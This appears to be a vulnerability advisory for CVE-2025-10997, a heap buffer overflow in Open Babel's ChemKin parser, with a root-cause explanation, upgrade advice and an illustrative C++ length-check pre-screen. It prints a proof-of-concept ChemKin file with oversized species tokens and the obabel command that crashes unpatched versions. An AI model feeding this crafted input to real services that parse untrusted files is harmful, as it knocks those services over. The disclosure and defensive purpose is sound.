high · 7.8 · CVE-2025-10997 · Jul 1, 2026

CVE-2025-10997: Open Babel Heap Buffer Overflow in ChemKin Parser

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

A crafted ChemKin reaction file can corrupt heap memory in Open Babel's species-lookup code, crashing any application that parses untrusted chemistry files.

Package: openbabel
Ecosystem: pip
Affected: < 3.2.0
Fixed in: 3.2.0

The problem

The function `ChemKinFormat::CheckSpecies` in `src/formats/chemkinformat.cpp` reads species tokens from a ChemKin REACTIONS block and passes them directly into a `std::map::find` call with no length or bounds validation.

An oversized or malformed species token corrupts the internal string buffer used as the map key. Under ASAN the crash is a heap-buffer-overflow READ of 8 bytes past the allocation boundary, inside `std::map::find` at `stl_map.h:1170`. The overflow is reachable from `ReadReactionQualifierLines`, which calls `CheckSpecies` for every species token on a reaction line.

Proof of concept

The following is a working proof-of-concept for CVE-2025-10997 in openbabel; the exact payload is reproduced below.

```text
! Minimized ChemKin reproducer for CVE-2025-10997
! Save as crash.ck and run: obabel -i ck crash.ck -o smi
ELEMENTS
H O N C
END
SPECIES
H2 O2 H2O
END
REACTIONS
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+H2O=H2+OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO  1.0E+13  0.0  0.0
END
```

The ChemKin format uses fixed-column-width fields (16 chars per species name in the canonical spec). Before the patch, `CheckSpecies` performed no length guard: it took the raw parsed token string and used it as a `std::map<std::string, ...>::find` key. When the token was much longer than the internally allocated SSO threshold or any assumed field width, the `std::string` construction itself or a prior `strncpy`-style copy into a fixed heap buffer wrote past the allocation boundary, corrupting adjacent heap metadata.

The fix (commit af4a4212, consolidated in PR #2913) added an explicit length check, rejecting any species token that exceeds the valid field width before it touches the map. CWE-122 (Heap-based Buffer Overflow) applies directly.

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains the fix in commit af4a4212 via PR #2913. If upgrading is not immediately possible, avoid exposing `obabel`, `OBConversion`, or any language binding to untrusted ChemKin files. Distributions shipping 3.1.1 (Debian, Ubuntu, etc.) should apply the distro security patch referenced in the advisory.
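The two defensive points above, the length guard that the patch introduced and the advice not to hand untrusted ChemKin files to an unpatched parser, can be illustrated together. The C++ below is an added example written for this page, not Open Babel's code and not the content of commit af4a4212: it splits a REACTIONS line into species tokens, refuses any token longer than the 16-character field width the format defines before that token is ever used as a `std::map` key, and wraps the same check in a whole-file pre-screen that an operator could run in front of `obabel` while waiting to upgrade. Every name here (`kMaxSpeciesLen`, `speciesTokenInBounds`, `splitSpecies`, `screenReactionLine`, `screenChemKinText`, `sampleChemKin`) is hypothetical, and the sample file is constructed for the example.

```cpp
#include <cctype>
#include <cstddef>
#include <iostream>
#include <map>
#include <sstream>
#include <string>
#include <vector>

// Canonical ChemKin species-name field width (16 characters). Tokens longer
// than this are rejected before they touch the map. Illustrative constant,
// not an identifier from Open Babel.
constexpr std::size_t kMaxSpeciesLen = 16;

// Outcome of screening one REACTIONS line.
struct ScreenResult {
    bool ok = true;                     // false if any token was out of bounds
    std::vector<std::string> rejected;  // the oversized tokens, in order seen
};

// The guard itself: check the length first, look the key up second.
bool speciesTokenInBounds(const std::string& tok) {
    return !tok.empty() && tok.size() <= kMaxSpeciesLen;
}

// Split "2H2+O2<=>2H2O" into species names, dropping leading stoichiometric
// coefficients. Third-body notation such as (+M) is not handled; this is a
// screening helper, not a full ChemKin parser.
std::vector<std::string> splitSpecies(const std::string& eqn) {
    std::vector<std::string> out;
    std::string cur;
    auto flush = [&]() {
        std::size_t i = 0;
        while (i < cur.size() && std::isdigit(static_cast<unsigned char>(cur[i]))) ++i;
        if (i < cur.size()) out.push_back(cur.substr(i));
        cur.clear();
    };
    for (char c : eqn) {
        if (c == '+' || c == '=' || c == '<' || c == '>') flush();
        else cur.push_back(c);
    }
    flush();
    return out;
}

// Screen one reaction line. The equation is the first whitespace-delimited
// field; the Arrhenius parameters after it are ignored. A token reaches the
// map lookup only after passing the length guard.
ScreenResult screenReactionLine(const std::string& line,
                                const std::map<std::string, int>& knownSpecies) {
    ScreenResult r;
    std::istringstream iss(line);
    std::string eqn;
    if (!(iss >> eqn)) return r;  // blank line
    for (const std::string& tok : splitSpecies(eqn)) {
        if (!speciesTokenInBounds(tok)) {
            r.ok = false;
            r.rejected.push_back(tok);
            continue;  // never reaches the lookup below
        }
        (void)knownSpecies.find(tok);  // bounded key: safe to use
    }
    return r;
}

// Pre-screen a whole ChemKin text: only lines inside REACTIONS ... END are
// checked. Returns every oversized token found, so a wrapper can refuse the
// file before an unpatched parser sees it.
std::vector<std::string> screenChemKinText(const std::string& text) {
    std::vector<std::string> rejected;
    const std::map<std::string, int> noSpecies;
    std::istringstream in(text);
    std::string line;
    bool inReactions = false;
    while (std::getline(in, line)) {
        std::istringstream head(line);
        std::string first;
        if (!(head >> first) || first[0] == '!') continue;  // blank or comment
        if (first == "REACTIONS" || first == "REAC") { inReactions = true; continue; }
        if (first == "END") { inReactions = false; continue; }
        if (!inReactions) continue;
        ScreenResult r = screenReactionLine(line, noSpecies);
        rejected.insert(rejected.end(), r.rejected.begin(), r.rejected.end());
    }
    return rejected;
}

// Constructed sample (not a file from the advisory): one well-formed reaction
// and one whose first species is 24 characters, past the 16-character field.
std::string sampleChemKin() {
    return "ELEMENTS\nH O\nEND\nSPECIES\nH2 O2 H2O O\nEND\nREACTIONS\n"
           "H2+O2=H2O+O  1.0E+13  0.0  0.0\n" +
           std::string(24, 'A') + "+H2O=H2+O  1.0E+13  0.0  0.0\nEND\n";
}

int main() {
    std::vector<std::string> bad = screenChemKinText(sampleChemKin());
    for (const std::string& tok : bad)
        std::cout << "rejected species token of " << tok.size() << " chars\n";
    return bad.empty() ? 0 : 1;  // non-zero exit: do not pass the file on
}
```

The order of operations is the whole point: the patch described above rejects the token on its length before any map access, and the screen here does the same, so an oversized token is reported and discarded rather than being turned into a key. Run against the reproducer above, the screen flags both the A-run and the O-run.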

Reported by OSS-Fuzz (Google).
